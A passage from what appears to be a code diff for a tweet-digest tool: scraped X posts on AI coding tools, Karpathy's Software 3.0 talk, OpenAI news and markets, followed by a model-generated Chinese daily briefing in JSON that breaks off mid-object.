"published_at": "2026-05-01T08:23:56+00:00", "title": "贵州牛肉粉 3u", "url": "https://x.com/0xAA_Science/status/2050129079677145442"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-05-01T08:17:19+00:00", "title": "Anthropic 这招真狠,所有 Claude Code 用户都该看一眼。\n\n@theo 做了个最干净的实验:\n建一个空 Git 仓库,commit 只放一行 JSON:\n\n{\"schema\": \"openclaw.inbound_meta.v1\"}\n\n调用官方 Claude Code —— 直接报错\"out of extra usage\"。\n要么拒绝请求,要么强制多收一份钱。\n\n0 行业务代码,只因为那一行 JSON 里有 OpenClaw 这个单词。\n\n模型在卷开源,工具会不会开始卷封闭?", "url": "https://x.com/runes_leo/status/2050127414630469937"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:17:08+00:00", "title": "The same will be true of “because of AI”.", "url": "https://x.com/pmarca/status/2050127365930729486"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:16:13+00:00", "title": "Image", "url": "https://x.com/pmarca/status/2050127137898922384"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:15:12+00:00", "title": "Every argument of “because of the smartphone” or “the Internet” or “social media” is cope, to avoid confronting the catastrophic collapse of incumbent institutional competence over the same timeframe.", "url": "https://x.com/pmarca/status/2050126879982805379"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:03:23+00:00", "title": "Ooh.", "url": "https://x.com/pmarca/status/2050123904849699053"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:01:35+00:00", "title": "R to @pmarca: Credit @qorprate", "url": "https://x.com/pmarca/status/2050123454373048716"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T07:56:57+00:00", "title": "And yet we write.", "url": "https://x.com/pmarca/status/2050122286603321365"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T07:53:41+00:00", "title": "Spotify真的挺有意思的\n\n为人类艺术家打上了“验证”标签\n\n是不是太多AI生成了。\n\n看来AI Generate的标识已经打不过来,甚至分辨不出来了", "url": "https://x.com/GoSailGlobal/status/2050121466021363878"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T07:51:20+00:00", "title": "Ooh.", "url": "https://x.com/pmarca/status/2050120872309264725"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T07:49:08+00:00", "title": "Ooh.", "url": "https://x.com/pmarca/status/2050120321399951771"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T07:49:04+00:00", "title": "OpenAI 要分家了\n\n山姆(Sam)醉酒发推\n\nGitHub 要完蛋了\n\nAnthropic 还是老样子\n\n播客也挺难的,支持一下", "url": "https://x.com/GoSailGlobal/status/2050120304203317373"}, {"handle": "bozhou_ai", "name": "泊舟", "published_at": "2026-05-01T07:46:06+00:00", "title": "Dragoncode群友也分享了一下设计的聚合站,我目前做的产品都是在这里面直接拿设计风格\n\nhttps://getdesign.md", "url": "https://x.com/bozhou_ai/status/2050119556644171998"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T07:40:37+00:00", "title": "⏺ OpenAI 官方发了一份 GPT-5.5 的 Prompt 编写指南,核心观点一句话概括:别再写又臭又长的 Prompt 了,告诉模型你要什么结果就行。\n\n这份指南的思路挺有意思。以前大家写 Prompt 的习惯是\"手把手教\":先做A,再做B,然后比较C。\n\n现在 OpenAI 官方的建议是:描述终点,而不是规定路线。\n\n几个值得注意的点:\n\n1. Outcome-First(结果导向):\n\n不要写一堆步骤让模型按顺序执行,而是描述\"成功是什么样的\",让模型自己决定怎么走。翻译成人话:以前是写\nSOP,现在是写验收标准。\n\n2. 停止条件(Stop", "url": "https://x.com/Pluvio9yte/status/2050118179062743418"}, {"handle": "frxiaobei", "name": "凡人小北", "published_at": "2026-05-01T07:35:11+00:00", "title": "这几周 Codex 常驻电脑,已经很久没有打开 ChatGPT 了。\n\n推荐一下插件和自动化,很上头。", "url": "https://x.com/frxiaobei/status/2050116811769954778"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-05-01T07:05:58+00:00", "title": "新时代的设计灵感聚合站,应该长这样。把网站的设计样式都变成了 design.md\n\nhttps://styles.refero.design/", "url": "https://x.com/dingyi/status/2050109458957947150"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T07:02:32+00:00", "title": "小米之家河南限定五一礼物钧瓷已拿到\n还送了水和王者明信片,汝窑会更好看,天青色\n\n对了,其实周杰伦的青花瓷这首歌最初写词是写的汝瓷\n不知道为啥换名字了\n\n青花瓷是靛蓝或者宝石蓝,不是天青色", "url": "https://x.com/realNyarime/status/2050108592246984780"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T06:32:41+00:00", "title": "跟推友问好👋\n\n有一个问题想问大家🙋\n\n放假都没出去,看了一圈好像没什么好玩的地方🤔\n\n所以想问问,有什么值得两人旅行的地方?😳", "url": "https://x.com/realNyarime/status/2050101082433720730"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-05-01T06:14:26+00:00", "title": "Karpathy 这场 Sequoia 演讲把 AI 编程下个阶段讲透了,最有感触的是第 6 条。\n\n1. Software 3.0 来了。\n1.0 写代码,2.0 训神经网络,3.0 在 LLM 的 context 里用自然语言\"编程\"。\n\n2. 2025-12 是拐点。\n生成代码块变大变连贯,编程的最小单位从\"写代码\"升级到\"委派任务\"。\n\n3. 神经网络会成主计算层。\n未来不是 CPU 上跑神经网络,是神经网络当主进程,传统计算变辅助。\n\n4. 许多应用会消失。\n用户不需应用,直接拿模型输出。MenuGen 那种轻量工具最先被替代。\n\n5. 验证性", "url": "https://x.com/runes_leo/status/2050096487967695197"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T05:58:11+00:00", "title": "硅谷101 这期 DeepSeek,我反复看了 3 遍\n\n陈茜也转发了我的推文\n\n3 个细节没人注意到,但对我们做出海/独立开发的影响最大:\n\n1️⃣ DeepSeek 全员 ~150 人,正面打 OpenAI 1000+\n\n出海产品从来不是\"等团队够大\",是\"敢做\"\n\n我 1 个人 3 个月上了 4 个出海工具,靠的就是 Cursor + DeepSeek API + 不内耗\n\n2️⃣ 幻方 7 年量化背景,把\"模型上线 → A/B → 不行就删\"做成了肌肉记忆\n\n3 周一次大版本,迭代速度是 OpenAI 的 3 倍\n\n独立开发者天然就该这么干,但 ", "url": "https://x.com/GoSailGlobal/status/2050092401004564952"}, {"handle": "bozhou_ai", "name": "泊舟", "published_at": "2026-05-01T05:57:01+00:00", "title": "目前已经有4位伙伴提交了作品,挺有意思的,都是一些小工具,估计就一两个小时就完成了", "url": "https://x.com/bozhou_ai/status/2050092103565496369"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T05:42:39+00:00", "title": "避雷一下中国电信英国(CTExcel UK)\n虽然补卡费用30块(3英镑),但为了恶心你一下增加了库存机制\n头一次听到补eSIM还能有“库存”这一说法的,这eSIM又不是实体卡,居然还能补卡卡池库存不足🤣🤣🤣", "url": "https://x.com/realNyarime/status/2050088491925815667"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T05:25:11+00:00", "title": "RT by @paulg: Sky's special correspondent @AlexCrawfordSky reports on the dozens of villages in southern Lebanon which have been virtually wiped out by Israel in a matter of weeks", "url": "https://x.com/paulg/status/2050084092402688337"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T04:54:26+00:00", "title": "x.com/i/article/204974561199…", "url": "https://x.com/GoSailGlobal/status/2050076357296824737"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T04:51:28+00:00", "title": "今天看了 @GabiExplores 的两个项目:\n\nstitch-kit · 22 ★ · Google Stitch MCP 完整设计 pipeline,35 skill / 5 层架构,覆盖 6 个 agent 平台\n\nslopbuster · 2 ★ · AI 文本去痕迹,含市面上唯一的 code 去 AI 味(comment / commit / naming),引用 4 篇 LLM 检测论文\n\n工程量:扎实。GitHub stars 加起来 24,X 关注 4。\n\n同期对比:obra/superpowers 173K,garrytan/gst", "url": "https://x.com/GoSailGlobal/status/2050075607707586658"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T04:39:44+00:00", "title": "⏺ Sam Altman 这段话说得挺实在的:AI 的下一个大突破不是某个具体领域,而是人们意识到自己每天在电脑上浪费了多少时间。\n\n简单说,大家以为 AI 的价值是\"帮你把某件事做得更好\",但 Altman认为真正的价值是\"帮你省掉那些根本不该做的事\"——在应用之间切换、复制粘贴、处理各种数字杂务。这些摩擦看着不起眼,但确实在不断打断心流。\n\n这个观点我是认同的。说说自己的体验:\n\n1. 以前写一篇翻译稿,光是在浏览器、编辑器、翻译工具之间来回切换就要耗掉不少精力。现在直接在 Claude Code 里一条龙搞定,中间那些摩擦几乎消失了。\n2. 以前整", "url": "https://x.com/Pluvio9yte/status/2050072657618772226"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T04:32:27+00:00", "title": "我艹!这一波Codex+GPT2 真是成了!\n直接可以来开发游戏了,而且只是用嘴!\n\n一句话就可以搞起来,完整教程看藏师傅的教程👇", "url": "https://x.com/berryxia/status/2050070823256654283"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-05-01T04:13:08+00:00", "title": "假新闻、任何虚假的东西,总是能获得更多关注。这对吗?", "url": "https://x.com/dingyi/status/2050065962855182350"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T04:04:38+00:00", "title": "Anthropic这个BioMysteryBench直接把我对AI在硬核科学领域真实能力的认知彻底刷新了🤯\n\n不是测评玩具benchmark,他们直接把Claude扔进99个来自真实研究的烂摊子生物信息学难题:原始DNA序列、临床样本那种messy到爆炸的数据,连PhD学生都要熬夜啃的开放谜题。\n\n结果呢?5个领域专家都搞不定的23个硬骨头,Claude Mythos Preview直接干掉了约30%,剩下大部分也拿下。Genentech和Roche自己跑的CompBioBench也印证了,Claude Opus 4.6整体准确率冲到81%……\n\n这已经", "url": "https://x.com/Pluvio9yte/status/2050063821377810451"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T03:47:55+00:00", "title": "卧槽,看完 Andrej Karpathy 在 Sequoia AI Ascent 2026 的最新访谈,我直接破防了🤯\n\n他说:最近几个月,他作为程序员从来没有感觉这么“behind”过……不,是突然之间,他发现自己再也不落后了。12月前后,agentic tools 突然从“偶尔靠谱”变成了“离谱地靠谱”。\n\nKarpathy说了三个阶段:\nSoftware 1.0:你写显式规则\nSoftware 2.0:你调数据+训练网络\nSoftware 3.0:你给 Context + Prompt,让 LLM 自己去当那个智能解释器\n\n举两个他亲身实验的狠例", "url": "https://x.com/Pluvio9yte/status/2050059618043543563"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T03:44:13+00:00", "title": "Customer service in the age of AI has been become truly horrible. Excruciatingly bad.", "url": "https://x.com/GaryMarcus/status/2050058685531983988"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T03:37:32+00:00", "title": "Hey @DHLCanadaHelp, your customer service really and truly sucks. You claimed to try to deliver a package, but didn’t actually contact me, didn’t leave a service card, your automated software won’t let me change delivery options, and I literally cannot reach a human. \n\nYou have s", "url": "https://x.com/GaryMarcus/status/2050057004862103767"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T03:24:52+00:00", "title": "这种平台有点意思,也见过好几个同类型的了。\n互动加热的平台其实很大程度上依赖宣传和用户自传播。\n见过两个逐渐杳无音讯的,目前唯一做起来的就是灯塔,看看这个平台会怎么样", "url": "https://x.com/Pluvio9yte/status/2050053813802090671"}, {"handle": "AravSrinivas", "name": "Aravind Srinivas", "published_at": "2026-05-01T03:22:08+00:00", "title": "Computer plays the orchestra", "url": "https://x.com/AravSrinivas/status/2050053128452456584"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T03:15:22+00:00", "title": "RT by @paulg: As agents become the biggest users of software, then all software has to be available in a headless fashion. Agents won’t be using your UI, they’ll be talking to your APIs.\n\nSo the question becomes what is the business model of software and this headless approach in", "url": "https://x.com/paulg/status/2050051426446152159"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T03:12:06+00:00", "title": "RT by @GaryMarcus: More money for worse work that you have to fix, good stuff this AI thing, thanks Nvidia.", "url": "https://x.com/GaryMarcus/status/2050050604915888484"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T03:08:51+00:00", "title": "🤔赚钱 -> 美股,长持复利\n\n2月开始关注上英特尔的,后面又加仓\n\n陈立武真是英特尔的福星", "url": "https://x.com/GoSailGlobal/status/2050049784094855501"}, {"handle": "AravSrinivas", "name": "Aravind Srinivas", "published_at": "2026-05-01T03:04:54+00:00", "title": "Video", "url": "https://x.com/AravSrinivas/status/2050048790908785072"}] diff --git a/data/x_brief/debug/20260502_033836_l1_stage2_output.json b/data/x_brief/debug/20260502_033836_l1_stage2_output.json new file mode 100644 index 0000000..673c76f --- /dev/null +++ b/data/x_brief/debug/20260502_033836_l1_stage2_output.json @@ -0,0 +1,267 @@ +{ + "raw_text": "\n\n{\"headline\":\"GPT-5.5发布会定档;Cursor SDK开放;Karpathy:Software 3.0拐点已至\",\"trending_keywords\":[\"GPT-5.5\",\"Cursor SDK\",\"Software 3.0\",\"Claude Code优化\",\"纳斯达克25000\"],\"themes\":[{\"id\":\"t1\",\"title\":\"Sam Altman亲承:OpenAI没有护城河,GPT-5.5发布会定档5月5日\",\"subtitle\":\"Altman称AI的switching costs正在崩塌,宣布GPT-5.5-Cyber网络安全模型即将上线\",\"priority\":\"P0\",\"bullets\":[\"Sam Altman:希望OpenAI做\\\"forever low margin\\\"公司,类比水电煤公用事业\",\"Switching costs正在崩塌,Altman认为AI真正价值是\\\"省掉不该做的事\\\"而非\\\"把某件事做得更好\\\"\",\"GPT-5.5发布会定档5月5日5:55 PM,GPT-5.5-Cyber前沿网络安全模型即将向关键网络防御者推出\"],\"samples\":[{\"text\":\"use codex or claude code, whatever works best for you\",\"url\":\"https://x.com/sama/status/2050274547061129577\",\"handle\":\"sama\",\"date\":\"2026-05-01\"},{\"text\":\"Switching costs are collapsing in AI.\",\"url\":\"https://x.com/sama/status/2049653810558353746\",\"handle\":\"sama\",\"date\":\"2026-05-01\"},{\"text\":\"Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。\",\"url\":\"https://x.com/Pluvio9yte/status/2050221337424408733\",\"handle\":\"Pluvio9yte\",\"date\":\"2026-05-01\"}]},{\"id\":\"t2\",\"title\":\"Cursor SDK正式开放:可构建自定义背景Agent\",\"subtitle\":\"Cursor面向Teams和Enterprise推出Security Review,支持自定义安全Agent\",\"priority\":\"P0\",\"bullets\":[\"Cursor SDK发布:可使用Cursor相同的runtime、harness和模型构建Agent\",\"开源三个 starter projects:coding agent CLI、prototyping tool、agent-powered kanban board\",\"Cursor Security Review现支持Teams和Enterprise:PR漏洞检查 Agent + 漏洞追踪 Agent\"],\"samples\":[{\"text\":\"Announcing Cursor SDK: Build agents with the same runtime, harness, and models as Cursor.\",\"url\":\"https://x.com/cursor_ai/status/2049499866217185492\",\"handle\":\"cursor_ai\",\"date\":\"2026-05-01\"},{\"text\":\"Cursor Security Review for Teams and Enterprise is now available.\",\"url\":\"https://x.com/cursor_ai/status/2049926283061035254\",\"handle\":\"cursor_ai\",\"date\":\"2026-05-01\"}]},{\"id\":\"t3\",\"title\":\"Karpathy:AI编程拐点已至,Software 3.0时代来临\",\"subtitle\":\"在Sequoia AI Ascent 2026峰会上提出Software 1.0/2.0/3.0范式演进\",\"priority\":\"P0\",\"bullets\":[\"2025-12是拐点:生成代码块变大变连贯,编程最小单位从\\\"写代码\\\"升级到\\\"委派任务\\\"\",\"神经网络正成为主计算层,未来不是CPU上跑神经网络,是神经网络当主进程\",\"验证性成为新瓶颈:能生成代码≠能生成正确、安全、可维护的软件\"],\"samples\":[{\"text\":\"Karpathy:2025-12是AI编程拐点,Software 3.0时代来临\",\"url\":\"https://x.com/Pluvio9yte/status/2050059618043543563\",\"handle\":\"Pluvio9yte\",\"date\":\"2026-05-01\"},{\"text\":\"神经网络会成主计算层,未来不是CPU上跑神经网络,是神经网络当主进程\",\"url\":\"https://x.com/runes_leo/status/2050096487967695197\",\"handle\":\"runes_leo\",\"date\":\"2026-05-01\"}]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"Claude Code大更新:/resume提速67%,MCP支持并发连接\",\"meta\":\"runes_leo\",\"summary\":\"Claude Code针对长session进行专项优化:/resume在40MB+ session上提速67%,50MB的/branch上限提升;MCP servers改为并发连接,启动不再卡在最慢那个\",\"url\":\"https://x.com/runes_leo/status/2050229609795407876\",\"handle\":\"runes_leo\",\"date\":\"2026-05-01\"},{\"id\":\"p02\",\"title\":\"纳斯达克首次突破25000点\",\"meta\":\"charliebilello\",\"summary\":\"纳斯达克指数首次站上25000点大关,一年 ago为18000,5年前14000,10年前4800\",\"url\":\"https://x.com/charliebilello/status/2050210847650132146\",\"handle\":\"charliebilello\",\"date\":\"2026-05-01\"},{\"id\":\"p03\",\"title\":\"NVIDIA过去10年涨幅22875%,比特币17205%\",\"meta\":\"charliebilello\",\"summary\":\"过去10年资产回报率对比:NVIDIA+22875%,比特币+17205%,AMD+10030%,Tesla+2362%,苹果+1233%\",\"url\":\"https://x.com/charliebilello/status/2050263578188333549\",\"handle\":\"charliebilello\",\"date\":\"2026-05-01\"},{\"id\":\"p04\",\"title\":\"美国汽油价格创30年最大涨幅\",\"meta\":\"charliebilello\",\"summary\":\"美国汽油价格升至4.39美元/加仑,为2022年7月以来最高,过去9周从2.98涨至4.39,涨幅47%为30年最大\",\"url\":\"https://x.com/charliebilello/status/2050196201014718675\",\"handle\":\"charliebilello\",\"date\":\"2026-05-01\"},{\"id\":\"p05\",\"title\":\"Anthropic发布BioMysteryBench:Claude在生物信息学领域突破\",\"meta\":\"Pluvio9yte\",\"summary\":\"BioMysteryBench将99个来自真实研究的生物信息学难题交给AI,Claude Mythos Preview搞定30%硬骨头,Opus 4.6准确率81%\",\"url\":\"https://x.com/Pluvio9yte/status/2050063821377810451\",\"handle\":\"Pluvio9yte\",\"date\":\"2026-05-01\"},{\"id\":\"p06\",\"title\":\"OpenAI Codex升级:非编程计算机工作提速42%\",\"meta\":\"sama\",\"summary\":\"Codex今日重大升级:Computer Use运行速度提升42%,支持非编程计算机工作\",\"url\":\"https://x.com/sama/status/2049946120441520624\",\"handle\":\"sama\",\"date\":\"2026-05-01\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.\",\"speaker\":\"Paul Graham\",\"date\":\"2026-05-01\",\"note\":\"Sam Altman转发\",\"url\":\"https://x.com/paulg/status/2050233324963008553\",\"handle\":\"paulg\"},{\"id\":\"q2\",\"quote\":\"we want to build tools to augment and elevate people, not entities to replace them.\",\"speaker\":\"Sam Altman\",\"date\":\"2026-05-01\",\"note\":\"Altman回应AI导致失业担忧\",\"url\":\"https://x.com/sama/status/2050229058425045178\",\"handle\":\"sama\"},{\"id\":\"q3\",\"quote\":\"All the Doomers and hawks are lining up behind this distillation \\\"attack\\\" farce because they want to see open source banned.\",\"speaker\":\"Yann LeCun\",\"date\":\"2026-05-01\",\"note\":\"LeCun再次力挺开源,炮轰AI限制派\",\"url\":\"https://x.com/ylecun/status/2050162348891979817\",\"handle\":\"ylecun\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"AI编程工具\",\"subtitle\":\"Cursor SDK开放构建自定义Agent\",\"level\":\"P0\",\"items\":[{\"text\":\"Cursor SDK发布,可构建自定义背景Agent\",\"url\":\"https://x.com/cursor_ai/status/2049499866217185492\"},{\"text\":\"Cursor 3.2:/multitask并行子代理、multi-root跨仓库工作区、worktrees并行任务\",\"url\":\"https://x.com/cursor_ai/status/2049926283061035254\"}]},{\"id\":\"c2\",\"title\":\"模型与产品\",\"subtitle\":\"GPT-5.5发布会定档\",\"level\":\"P0\",\"items\":[{\"text\":\"GPT-5.5发布会5/5 5:55 PM在OpenAI SF总部\",\"url\":\"https://x.com/sama/status/2049653810558353746\"},{\"text\":\"GPT-5.5-Cyber网络安全模型即将推出\",\"url\":\"https://x.com/sama/status/2049712078836170843\"}]},{\"id\":\"c3\",\"title\":\"投资与宏观\",\"subtitle\":\"纳斯达克里程碑+能源价格飙升\",\"level\":\"P1\",\"items\":[{\"text\":\"纳斯达克首破25000点\",\"url\":\"https://x.com/charliebilello/status/2050210847650132146\"},{\"text\":\"美国汽油价格创30年最大涨幅,9周涨47%至4.39美元/加仑\",\"url\":\"https://x.com/charliebilello/status/2050196201014718675\"}]},{\"id\":\"c4\",\"title\":\"AI研究突破\",\"subtitle\":\"Karpathy Software 3.0 + Anthropic生物Bench\",\"level\":\"P1\",\"items\":[{\"text\":\"Karpathy:2025-12是AI编程拐点,最小单位从\\\"写代码\\\"升级为\\\"委派任务\\\"\",\"url\":\"https://x.com/Pluvio9yte/status/2050059618043543563\"},{\"text\":\"Anthropic BioMysteryBench:Claude Opus 4.6在生物信息学难题准确率81%\",\"url\":\"https://x.com/Pluvio9yte/status/2050063821377810451\"}]},{\"id\":\"c5\",\"title\":\"开源与生态\",\"subtitle\":\"LeCun再杠开源限制\",\"level\":\"P2\",\"items\":[{\"text\":\"LeCun:Doomers想通过\\\"蒸馏攻击\\\"封禁开源,是在剥夺选择权\",\"url\":\"https://x.com/ylecun/status/2050162348891979817\"},{\"text\":\"匿名实验:Claude Code对含特定关键词的仓库报错\\\"out of extra usage\\\"\",\"url\":\"https://x.com/runes_leo/status/2050127414630469937\"}]},{\"id\":\"c6\",\"title\":\"华语圈热点\",\"subtitle\":\"中文博主实操分享\",\"level\":\"P2\",\"items\":[{\"text\":\"铁锤人:Apple Support App用Claude Code打包\",\"url\":\"https://x.com/lxfater/status/2050240636020732015\"},{\"text\":\"0xAA:Cursor额度$150已用光,正在找循环任务消耗剩余$10000额度\",\"url\":\"https://x.com/0xAA_Science/status/2050244250563182801\"}]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"MID\",\"title\":\"Gary Marcus:AI对齐尚未解决,大规模部署风险极高\",\"detail\":\"Marcus认为从LLM获取真正对齐是痴心妄想,在没有健壮解决方案的情况下大规模部署LLM极其危险\",\"url\":\"https://x.com/GaryMarcus/status/2050296366161940584\"},{\"id\":\"r2\",\"level\":\"MID\",\"title\":\"Gary Marcus:AI对GDP的贡献类似\\\"挖坑填坑\\\"\",\"detail\":\"引用David Sacks观点:付钱让人挖坑再填回去GDP也会涨,AI当前对GDP的贡献可能同样没有真正价值\",\"url\":\"https://x.com/GaryMarcus/status/2050284439343862266\"},{\"id\":\"r3\",\"level\":\"OPP\",\"title\":\"用户隐私争议再起\",\"detail\":\"Gary Marcus:Meta就是Black Mirror的化身,用户隐私问题持续引发担忧\",\"url\":\"https://x.com/GaryMarcus/status/2050275183223857462\"}]}", + "parsed_modules": { + "headline": "GPT-5.5发布会定档;Cursor SDK开放;Karpathy:Software 3.0拐点已至", + "trending_keywords": [ + "GPT-5.5", + "Cursor SDK", + "Software 3.0", + "Claude Code优化", + "纳斯达克25000" + ], + "themes": [ + { + "id": "t1", + "title": "Sam Altman亲承:OpenAI没有护城河,GPT-5.5发布会定档5月5日", + "subtitle": "Altman称AI的switching costs正在崩塌,宣布GPT-5.5-Cyber网络安全模型即将上线", + "priority": "P0", + "bullets": [ + "Sam Altman:希望OpenAI做\"forever low margin\"公司,类比水电煤公用事业", + "Switching costs正在崩塌,Altman认为AI真正价值是\"省掉不该做的事\"而非\"把某件事做得更好\"", + "GPT-5.5发布会定档5月5日5:55 PM,GPT-5.5-Cyber前沿网络安全模型即将向关键网络防御者推出" + ], + "samples": [ + { + "text": "use codex or claude code, whatever works best for you", + "url": "https://x.com/sama/status/2050274547061129577", + "handle": "sama", + "date": "2026-05-01" + }, + { + "text": "Switching costs are collapsing in AI.", + "url": "https://x.com/sama/status/2049653810558353746", + "handle": "sama", + "date": "2026-05-01" + }, + { + "text": "Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。", + "url": "https://x.com/Pluvio9yte/status/2050221337424408733", + "handle": "Pluvio9yte", + "date": "2026-05-01" + } + ] + }, + { + "id": "t2", + "title": "Cursor SDK正式开放:可构建自定义背景Agent", + "subtitle": "Cursor面向Teams和Enterprise推出Security Review,支持自定义安全Agent", + "priority": "P0", + "bullets": [ + "Cursor SDK发布:可使用Cursor相同的runtime、harness和模型构建Agent", + "开源三个 starter projects:coding agent CLI、prototyping tool、agent-powered kanban board", + "Cursor Security Review现支持Teams和Enterprise:PR漏洞检查 Agent + 漏洞追踪 Agent" + ], + "samples": [ + { + "text": "Announcing Cursor SDK: Build agents with the same runtime, harness, and models as Cursor.", + "url": "https://x.com/cursor_ai/status/2049499866217185492", + "handle": "cursor_ai", + "date": "2026-05-01" + }, + { + "text": "Cursor Security Review for Teams and Enterprise is now available.", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "handle": "cursor_ai", + "date": "2026-05-01" + } + ] + }, + { + "id": "t3", + "title": "Karpathy:AI编程拐点已至,Software 3.0时代来临", + "subtitle": "在Sequoia AI Ascent 2026峰会上提出Software 1.0/2.0/3.0范式演进", + "priority": "P0", + "bullets": [ + "2025-12是拐点:生成代码块变大变连贯,编程最小单位从\"写代码\"升级到\"委派任务\"", + "神经网络正成为主计算层,未来不是CPU上跑神经网络,是神经网络当主进程", + "验证性成为新瓶颈:能生成代码≠能生成正确、安全、可维护的软件" + ], + "samples": [ + { + "text": "Karpathy:2025-12是AI编程拐点,Software 3.0时代来临", + "url": "https://x.com/Pluvio9yte/status/2050059618043543563", + "handle": "Pluvio9yte", + "date": "2026-05-01" + }, + { + "text": "神经网络会成主计算层,未来不是CPU上跑神经网络,是神经网络当主进程", + "url": "https://x.com/runes_leo/status/2050096487967695197", + "handle": "runes_leo", + "date": "2026-05-01" + } + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "Claude Code大更新:/resume提速67%,MCP支持并发连接", + "meta": "runes_leo", + "summary": "Claude Code针对长session进行专项优化:/resume在40MB+ session上提速67%,50MB的/branch上限提升;MCP servers改为并发连接,启动不再卡在最慢那个", + "url": "https://x.com/runes_leo/status/2050229609795407876", + "handle": "runes_leo", + "date": "2026-05-01" + }, + { + "id": "p02", + "title": "纳斯达克首次突破25000点", + "meta": "charliebilello", + "summary": "纳斯达克指数首次站上25000点大关,一年 ago为18000,5年前14000,10年前4800", + "url": "https://x.com/charliebilello/status/2050210847650132146", + "handle": "charliebilello", + "date": "2026-05-01" + }, + { + "id": "p03", + "title": "NVIDIA过去10年涨幅22875%,比特币17205%", + "meta": "charliebilello", + "summary": "过去10年资产回报率对比:NVIDIA+22875%,比特币+17205%,AMD+10030%,Tesla+2362%,苹果+1233%", + "url": "https://x.com/charliebilello/status/2050263578188333549", + "handle": "charliebilello", + "date": "2026-05-01" + }, + { + "id": "p04", + "title": "美国汽油价格创30年最大涨幅", + "meta": "charliebilello", + "summary": "美国汽油价格升至4.39美元/加仑,为2022年7月以来最高,过去9周从2.98涨至4.39,涨幅47%为30年最大", + "url": "https://x.com/charliebilello/status/2050196201014718675", + "handle": "charliebilello", + "date": "2026-05-01" + }, + { + "id": "p05", + "title": "Anthropic发布BioMysteryBench:Claude在生物信息学领域突破", + "meta": "Pluvio9yte", + "summary": "BioMysteryBench将99个来自真实研究的生物信息学难题交给AI,Claude Mythos Preview搞定30%硬骨头,Opus 4.6准确率81%", + "url": "https://x.com/Pluvio9yte/status/2050063821377810451", + "handle": "Pluvio9yte", + "date": "2026-05-01" + }, + { + "id": "p06", + "title": "OpenAI Codex升级:非编程计算机工作提速42%", + "meta": "sama", + "summary": "Codex今日重大升级:Computer Use运行速度提升42%,支持非编程计算机工作", + "url": "https://x.com/sama/status/2049946120441520624", + "handle": "sama", + "date": "2026-05-01" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", + "speaker": "Paul Graham", + "date": "2026-05-01", + "note": "Sam Altman转发", + "url": "https://x.com/paulg/status/2050233324963008553", + "handle": "paulg" + }, + { + "id": "q2", + "quote": "we want to build tools to augment and elevate people, not entities to replace them.", + "speaker": "Sam Altman", + "date": "2026-05-01", + "note": "Altman回应AI导致失业担忧", + "url": "https://x.com/sama/status/2050229058425045178", + "handle": "sama" + }, + { + "id": "q3", + "quote": "All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned.", + "speaker": "Yann LeCun", + "date": "2026-05-01", + "note": "LeCun再次力挺开源,炮轰AI限制派", + "url": "https://x.com/ylecun/status/2050162348891979817", + "handle": "ylecun" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI编程工具", + "subtitle": "Cursor SDK开放构建自定义Agent", + "level": "P0", + "items": [] + }, + { + "id": "c2", + "title": "模型与产品", + "subtitle": "GPT-5.5发布会定档", + "level": "P0", + "items": [ + { + "text": "GPT-5.5-Cyber网络安全模型即将推出", + "url": "https://x.com/sama/status/2049712078836170843" + } + ] + }, + { + "id": "c3", + "title": "投资与宏观", + "subtitle": "纳斯达克里程碑+能源价格飙升", + "level": "P1", + "items": [] + }, + { + "id": "c4", + 